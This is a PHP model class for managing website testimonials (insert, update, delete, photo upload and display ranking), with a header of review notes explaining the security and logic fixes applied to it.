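<?php
/**
 * Testimonial model: CRUD plus display-rank maintenance on the `testimonials` table.
 *
 * Relies on two names defined elsewhere in the project:
 *  - the global $Database, a mysqli-style handle (prepare / bind_param / execute ...);
 *  - the Template class, whose set_alert() queues a user-facing message.
 *
 * Review notes on what was changed and why:
 *  - add_mod() used the client-supplied $_FILES['photo']['name'] verbatim as the
 *    destination path under views/images/testimonials/, with no extension check.
 *    That allowed path traversal via "../" and writing an arbitrary .php file into
 *    the web root. Uploads are now allow-listed by extension, verified with
 *    is_uploaded_file(), and stored under a sanitised, uniquely prefixed basename.
 *  - get() interpolated $rank straight into ORDER BY (SQL injection). The sort
 *    spec is now restricted to known columns with an optional ASC/DESC.
 *  - The UPDATE in add_mod() bound six variables to five placeholders, so every
 *    update failed; the insert branch compared a path string with `=== true`.
 *  - $stmt->close() was placed after `return` and never ran.
 *  - update_rank() echoed debug output into the page; delete() shifted the wrong
 *    side of the rank sequence, leaving a duplicate rank on the next insert.
 *  - decrement_rank() was called with three arguments but declared with two,
 *    so its bounds were silently shifted by one position.
 */
class Testimonial {
    private $Database;
    private $db_table = 'testimonials';

    /** Directory (relative to the working directory) where photos are written. */
    const PHOTO_DIR = 'views/images/testimonials/';

    /** Lower-cased upload extensions accepted for a testimonial photo. */
    private static $allowed_ext = array('jpg', 'jpeg', 'png', 'gif');

    /** Columns a caller may sort on; anything else falls back to the default order. */
    private static $sortable_columns = array('testID', 'dispName', 'message', 'photo', 'rank', 'addedTS');

    function __construct(){
        global $Database;
        $this->Database = $Database;
    }

    /**
     * Map a caller-supplied sort spec onto an allow-listed ORDER BY clause.
     * Accepts "<column>" or "<column> ASC|DESC" for a known column; anything else
     * (including '') yields the previous default of 'addedTS DESC'.
     */
    private function order_clause($spec){
        $default = 'addedTS DESC';
        if (!is_string($spec) || trim($spec) === ''){
            return $default;
        }
        $parts = preg_split('/\s+/', trim($spec));
        if (count($parts) > 2 || !in_array($parts[0], self::$sortable_columns, true)){
            return $default;
        }
        $direction = isset($parts[1]) ? strtoupper($parts[1]) : '';
        if ($direction !== '' && $direction !== 'ASC' && $direction !== 'DESC'){
            return $default;
        }
        return $direction === '' ? $parts[0] : $parts[0] . ' ' . $direction;
    }

    /**
     * Fetch one testimonial (when $testID > 0) or all of them.
     *
     * @param int|string $testID  id of a single row; 0 or '' selects every row
     * @param string     $rank    sort spec for the "all" case, see order_clause()
     * @return array  a single row array, a list of row arrays, or an empty array
     *                when nothing matched or the statement could not be prepared
     */
    public function get($testID, $rank){
        $data = array();
        $Template = new Template;

        if ($testID > 0){
            // single row by primary key
            if ($stmt = $this->Database->prepare("SELECT * FROM " . $this->db_table . " WHERE testID = ?")){
                $stmt->bind_param('i', $testID);
                $stmt->execute();
                $stmt->store_result();
                $stmt->bind_result($testID, $dispName, $message, $photo, $rank, $addedTS);
                if ($stmt->num_rows() > 0){
                    $stmt->fetch();
                    $data = array('testID'=>$testID, 'dispName'=>$dispName, 'message'=>$message,
                                  'photo'=>$photo, 'rank'=>$rank, 'addedTS'=>$addedTS);
                }
                $stmt->close();
            } else {
                $Template->set_alert("Query error: ".__line__." m_testimonies");
            }
            return $data;
        }

        // every row; the ORDER BY clause is allow-listed, never taken from input verbatim
        $orderBy = $this->order_clause($rank);
        if ($stmt = $this->Database->prepare("SELECT * FROM " . $this->db_table . " ORDER BY " . $orderBy)){
            $stmt->execute();
            $stmt->store_result();
            $stmt->bind_result($testID, $dispName, $message, $photo, $rank, $addedTS);
            while ($stmt->fetch()){
                $data[] = array('testID'=>$testID, 'dispName'=>$dispName, 'message'=>$message,
                                'photo'=>$photo, 'rank'=>$rank, 'addedTS'=>$addedTS);
            }
            $stmt->close();
        } else {
            $Template->set_alert("Query error: ".__line__." m_testimonies");
        }
        return $data;
    } // end get method

    /**
     * Store the photo from $_FILES['photo'], if one was submitted and it is acceptable.
     *
     * Returns array('attempted' => bool, 'path' => string|null, 'name' => string|null):
     * 'attempted' is true whenever a filename was submitted, 'path'/'name' are set only
     * when the file was actually written. The stored name is a unique prefix plus the
     * sanitised original basename (dots stripped from the stem, so "x.php.jpg" cannot
     * survive) with an allow-listed extension; the client name is never used as a path.
     */
    private function store_photo(){
        $result = array('attempted' => false, 'path' => null, 'name' => null);
        if (!isset($_FILES['photo']) || !is_array($_FILES['photo']) || $_FILES['photo']['name'] == ''){
            return $result;
        }
        $result['attempted'] = true;
        if (!isset($_FILES['photo']['error']) || $_FILES['photo']['error'] !== UPLOAD_ERR_OK){
            return $result;
        }
        $clientName = (string)$_FILES['photo']['name'];
        $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
        if (!in_array($ext, self::$allowed_ext, true)){
            return $result;
        }
        // is_uploaded_file() rejects anything that did not arrive through this request's upload
        if (!is_uploaded_file($_FILES['photo']['tmp_name'])){
            return $result;
        }
        $stem = preg_replace('/[^A-Za-z0-9_-]/', '_', pathinfo($clientName, PATHINFO_FILENAME));
        if ($stem === '' || $stem === null){
            $stem = 'photo';
        }
        $safeName = uniqid() . '_' . $stem . '.' . $ext;
        $dest = self::PHOTO_DIR . $safeName;
        if (move_uploaded_file($_FILES['photo']['tmp_name'], $dest)){
            $result['path'] = $dest;
            $result['name'] = $safeName;
        }
        return $result;
    }

    /**
     * Insert (when $testID is 0/'') or update a testimonial, handling an optional
     * photo upload and the $_POST['delPhoto'] flag. Outcome is reported via Template
     * alerts; nothing is returned.
     *
     * @param int|string $testID   existing row id, or 0/'' to insert
     * @param string     $dispName display name
     * @param string     $message  testimonial body
     * @param string     $xPhoto   currently stored photo name, kept when no new file is sent
     */
    public function add_mod($testID, $dispName, $message, $xPhoto){
        $Template = new Template;
        $photo = $xPhoto;

        $upload = $this->store_photo();
        if ($upload['name'] !== null){
            $photo = $upload['name'];
        } else if (!$upload['attempted'] && isset($_POST['delPhoto'])){
            $photo = '';
        }
        // NOTE(review): on a failed upload the previous photo name is kept rather than
        // storing a filename that was never written to disk.
        $uploadfile = $upload['path'] === null ? '' : $upload['path'];

        date_default_timezone_set('Canada/Pacific');
        $addedTS = time();

        if ($testID > 0){
            // update record: five placeholders, five bound values
            if ($stmt = $this->Database->prepare("UPDATE ". $this->db_table . " SET dispName=?, message=?, photo=?, addedTS=? WHERE testID = ?")){
                $stmt->bind_param('sssii', $dispName, $message, $photo, $addedTS, $testID);
                if ($stmt->execute()){
                    $alert_message = 'Testimonial updated';
                    if ($upload['attempted']){
                        if ($upload['path'] !== null){
                            $alert_message .= " & photo upload successful.";
                        } else {
                            $alert_message .= " BUT photo did not upload (" . $uploadfile . ").";
                        }
                    }
                    $Template->set_alert($alert_message, 'success');
                } else {
                    $Template->set_alert('ERROR: Testimonial did not update', 'error');
                }
                $stmt->close();
            }
            return;
        }

        // insert record: new entries go to the end of the display order
        $rows = $this->get('', '');
        $rank = count($rows) + 1;
        if ($stmt = $this->Database->prepare("INSERT INTO ". $this->db_table . " (testID, dispName, message, photo, rank, addedTS) VALUES (?,?,?,?,?,?)")){
            $stmt->bind_param('isssii', $testID, $dispName, $message, $photo, $rank, $addedTS);
            if ($stmt->execute()){
                $alert_message = 'Testimonial added';
                if ($upload['attempted']){
                    if ($upload['path'] !== null){
                        $alert_message .= " & photo upload successful.";
                    } else {
                        $alert_message .= " BUT photo did not upload.";
                    }
                }
                $Template->set_alert($alert_message, 'success');
            } else {
                $Template->set_alert('ERROR: Testimonial was not added', 'error');
            }
            $stmt->close();
        }
    } // end add_mod method

    /**
     * Move testimonial $testID from display position $oldRank to $rank, shifting the
     * rows in between by one so ranks stay contiguous. Reports via Template alerts.
     */
    public function update_rank($testID, $rank, $oldRank){
        $Template = new Template;
        $newRank = (int)$rank;
        $oldRank = (int)$oldRank;

        if ($newRank > $oldRank){
            // moving down the list: rows between old and new positions move up one
            $this->decrement_rank($newRank, $oldRank);
        } else if ($newRank < $oldRank){
            // moving up the list: rows between new and old positions move down one
            $this->increment_rank($testID, $newRank, $oldRank);
        }

        if ($testID > 0){
            if ($stmt = $this->Database->prepare("UPDATE " . $this->db_table ." SET rank = ? WHERE testID = ?")){
                $stmt->bind_param('ii', $newRank, $testID);
                if ($stmt->execute()){
                    $Template->set_alert('Changes saved', 'success');
                } else {
                    $Template->set_alert('ERROR: Changes not saved', 'error');
                }
                $stmt->close();
            }
        }
    }

    /** Subtract one from every rank in ($oldRank, $rank]. */
    public function decrement_rank($rank, $oldRank){
        $increment = 1;
        $upper = (int)$rank;
        $lower = (int)$oldRank;
        if ($stmt = $this->Database->prepare('UPDATE ' . $this->db_table . " SET rank = rank-? WHERE rank > ? and rank <= ?")){
            $stmt->bind_param('iii', $increment, $lower, $upper);
            $stmt->execute();
            $stmt->close();
        }
    }

    /** Add one to every rank in [$rank, $oldRank). $testID is accepted for signature compatibility only. */
    public function increment_rank($testID, $rank, $oldRank){
        $increment = 1;
        $lower = (int)$rank;
        $upper = (int)$oldRank;
        if ($stmt = $this->Database->prepare('UPDATE ' . $this->db_table . " SET rank = rank+? WHERE rank < ? and rank >= ?")){
            $stmt->bind_param('iii', $increment, $upper, $lower);
            $stmt->execute();
            $stmt->close();
        }
    }

    /** After a row at $removedRank is deleted, pull every higher rank down by one. */
    private function close_rank_gap($removedRank){
        $removedRank = (int)$removedRank;
        if ($stmt = $this->Database->prepare('UPDATE ' . $this->db_table . " SET rank = rank-1 WHERE rank > ?")){
            $stmt->bind_param('i', $removedRank);
            $stmt->execute();
            $stmt->close();
        }
    }

    /**
     * Delete testimonial $testID, which currently sits at display position $rank,
     * and close the gap it leaves in the rank sequence. Reports via Template alerts.
     */
    public function delete($testID, $rank){
        $Template = new Template;
        if ($stmt = $this->Database->prepare("DELETE FROM " . $this->db_table . " WHERE testID=?")){
            $stmt->bind_param('i', $testID);
            $ok = $stmt->execute();
            $stmt->close();
            if ($ok){
                $this->close_rank_gap($rank);
                $Template->set_alert('Testimonial deleted', 'success');
            } else {
                $Template->set_alert('ERROR: Testimonial was not deleted', 'error');
            }
        }
    } // end delete method
}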